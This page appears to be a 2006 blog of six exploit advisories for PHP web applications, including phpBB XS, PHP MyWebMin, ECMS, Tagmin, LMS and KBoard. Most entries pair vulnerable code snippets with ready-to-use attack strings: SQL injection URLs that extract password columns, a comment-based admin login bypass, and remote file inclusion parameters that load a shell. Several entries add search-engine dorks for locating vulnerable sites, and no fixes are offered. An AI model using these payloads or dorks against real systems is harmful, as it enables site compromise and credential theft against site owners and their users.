Friday, September 29, 2006

phpBB XS (phpbb_root_path) Remote File Inclusion Spain Version

#######################################
+Advisory #6
+phpBB XS (phpbb_root_path) Remote File Inclusion
+Not:Spain Version
+Develop:http://www.elanzuelo.es/phpbb.tar.gz
+Dork: "Traduccion Espanol por phpBB-Es"
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable File: includes/functions_kb.php
..
include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx);
..
?>


Example:
http://site/path/includes/functions_kb.php?phpbb_root_path=shell

Thursday, September 28, 2006

PHP MyWebMin 1.0 Remote File Include

#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable File:window.php
$ordner = opendir("$target");
?>

and

include("$target/preferences.php");

if($action != "")
{
include("$action.php");
?>

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php

ECMS 2.0 Sql Injection and Security bypass

#######################################
+ECMS 2.0 Sql Injection and Security bypass
+Advisory #4
+Product :ECMS 2.0
+Develop : http://www.evaria.com
+Vulnerable: SQL injection & Security bypass
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Examples:
#Security bypass
login: admin'/*

#Sql Injection:
http://[TARGET]/ecms/en/?choice=section&xid=[SQL code]
http://[TARGET]/ecms/en/?choice=section&xid=4'UNION SELECT lastlogin,passwd FROM authuser/*
http://[TARGET]/ecms/en/?choice=section&xid=4'UNION SELECT id,uname FROM authuser/*

Tagmin C.C 2.1.B Remote File Include

########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell

LMS 1.12 Sql Injection

########################################
+Advisory #2
+LMS 1.12 Sql Injection
+Product :Learning Management Systems
+Develop :http://learning-management-system.info
+Vulnerable: SQL injection
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerables:

http://site/path/index.php?sub=students&action=edit&user_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users/*

http://site/path/index.php?sub=messages&action=det&msg_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users WHERE user_id=6/*

KBoard v0.6 Sql Injection

#######################################
+Advisory #1
+KBoard v0.6 Sql Injection
+Product : KBoard Forum v0.6
+Develop : http://sourceforge.net/project/showfiles.php?group_id=92748
+Class: SQL injection
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa;)
########################################
~Auth:

Examples:
--------
index.php?id='[SQL]
user_posthistory.php?search_id='[SQL]
user_profile.php?id='[SQl]
forum_threadlist.php?forum_id='[SQL]
post_thread.php?forum_id='[SQL]
thread_view.php?thread_id='[SQL]
thread_view.php?forum_id='[SQL]
addressbook_add.php?id='[SQL]
account_edit.php?accountselected=1&aid='[SQL]


Vulnerable:

http://site/path/index.php?id=991199'UNION SELECT id,id,password,password,sig,id FROM accounts/*